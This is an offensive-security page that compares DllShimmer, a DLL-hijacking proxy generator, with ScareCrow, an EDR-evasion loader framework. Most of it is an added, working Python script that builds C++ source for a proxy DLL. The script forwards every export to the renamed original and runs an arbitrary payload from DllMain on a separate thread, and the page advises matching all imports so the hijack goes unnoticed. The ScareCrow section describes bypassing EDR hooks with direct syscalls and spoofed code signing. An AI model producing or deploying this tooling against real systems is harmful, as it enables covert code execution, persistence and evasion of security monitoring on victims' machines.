DllShimmer vs ScareCrow
About DllShimmer
DllShimmer automates the exploitation of DLL hijacking vulnerabilities by generating proxy DLLs that reproduce the export table of the target DLL. When the vulnerable application loads the generated DLL, every legitimate function call is forwarded to the renamed original DLL while attacker-controlled code runs alongside it, so the application keeps working and the hijack is not immediately noticed. The tool generates the C++ boilerplate for the backdoor payload, handles export matching, and produces ready-to-compile Visual Studio projects, which substantially reduces the manual effort of weaponizing DLL hijack opportunities found during engagements.
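The core of what DllShimmer automates is turning the target's export table into MSVC linker forwarders plus a DllMain that launches the payload. The script below is an added illustration of that step, not DllShimmer's own code: it takes a hand-constructed export list (the names, ordinals and the `version_orig.dll` file name are assumptions for the example, not read from a real binary), emits one `/export:Name=target.Name,@ordinal` pragma per export, handles ordinal-only (NONAME) exports by forwarding with the `dll.#N` form, and checks that every import the host application needs is actually present, since a single missing export makes the loader fail before the payload runs.

```python
"""Generate MSVC forwarder pragmas for a DLL-hijack proxy.

Added example, not DllShimmer's own code. The export list and DLL names
below are constructed for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional, Sequence


@dataclass(frozen=True)
class Export:
    ordinal: int
    name: Optional[str]  # None for ordinal-only (NONAME) exports


def forwarder_target(original_dll: str) -> str:
    """Forwarder strings name the module without its extension; the loader
    appends ".dll" itself ("version_orig" -> version_orig.dll)."""
    base = original_dll.lower()
    if base.endswith(".dll"):
        base = base[:-4]
    if not base or "." in base:
        raise ValueError(f"unusable forwarder module name: {original_dll!r}")
    return base


def forward_pragmas(exports: Sequence[Export], original_dll: str) -> List[str]:
    """One #pragma comment(linker, "/export:...") line per export.

    Ordinals are always preserved: some importers bind by ordinal even when
    a name exists, and a renumbered table would break them silently."""
    target = forwarder_target(original_dll)
    seen = set()
    lines = []
    for e in sorted(exports, key=lambda x: x.ordinal):
        if e.ordinal in seen:
            raise ValueError(f"duplicate ordinal {e.ordinal}")
        seen.add(e.ordinal)
        if e.name is None:
            # Ordinal-only export: the entry needs a placeholder name for the
            # linker, NONAME keeps it out of the name table, and the forwarder
            # must point at the original's ordinal (target.#N).
            lines.append(
                f'#pragma comment(linker, "/export:Ordinal{e.ordinal}='
                f'{target}.#{e.ordinal},@{e.ordinal},NONAME")'
            )
        else:
            lines.append(
                f'#pragma comment(linker, "/export:{e.name}='
                f'{target}.{e.name},@{e.ordinal}")'
            )
    return lines


def missing_exports(exports: Sequence[Export], imported_names: Sequence[str]) -> List[str]:
    """Names the host imports that the proxy would not export. Any entry here
    means "The procedure entry point ... could not be located" at load time."""
    have = {e.name for e in exports if e.name is not None}
    return sorted(n for n in imported_names if n not in have)


PROXY_TEMPLATE = """\
// Generated proxy DLL: every export is forwarded to {target}.dll, so the host
// sees an unchanged API surface while DllMain starts the payload.
#include <windows.h>

{pragmas}

static DWORD WINAPI Payload(LPVOID) {{
    {payload}
    return 0;
}}

BOOL APIENTRY DllMain(HMODULE, DWORD reason, LPVOID) {{
    if (reason == DLL_PROCESS_ATTACH) {{
        // Run on a fresh thread: DllMain executes under the loader lock, where
        // LoadLibrary, CreateProcess and friends can deadlock the host.
        HANDLE h = CreateThread(nullptr, 0, Payload, nullptr, 0, nullptr);
        if (h) CloseHandle(h);
    }}
    return TRUE;
}}
"""


def proxy_source(exports: Sequence[Export], original_dll: str, payload: str) -> str:
    """Assemble the complete C++ source for the proxy DLL."""
    return PROXY_TEMPLATE.format(
        target=forwarder_target(original_dll),
        pragmas="\n".join(forward_pragmas(exports, original_dll)),
        payload=payload,
    )


# Constructed sample: a pretend version.dll with two named exports and one
# ordinal-only export; the original is assumed to be renamed version_orig.dll.
SAMPLE_EXPORTS = [
    Export(1, "GetFileVersionInfoSizeW"),
    Export(2, "GetFileVersionInfoW"),
    Export(3, None),
]

if __name__ == "__main__":
    print(proxy_source(SAMPLE_EXPORTS, "version_orig.dll", "MessageBoxA(nullptr, \"hijacked\", \"\", 0);"))
```

Before building, run `missing_exports` against the import list of the hijacked executable (dumpbin /imports or a PE parser); a proxy that satisfies only the exports you happened to notice will crash the host instead of blending in.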
About ScareCrow
ScareCrow is a payload creation framework that generates loaders intended to bypass Endpoint Detection and Response (EDR) products. Its loaders issue Windows system calls directly rather than through the standard WinAPI, sidestepping the userland hooks that EDR products place in system DLLs to observe process behaviour. ScareCrow supports several loader types (DLL sideloading, binary, JScript, HTA), code signing with spoofed certificates, and integration with shellcode generators such as Donut. It is one of the best-known public EDR evasion frameworks.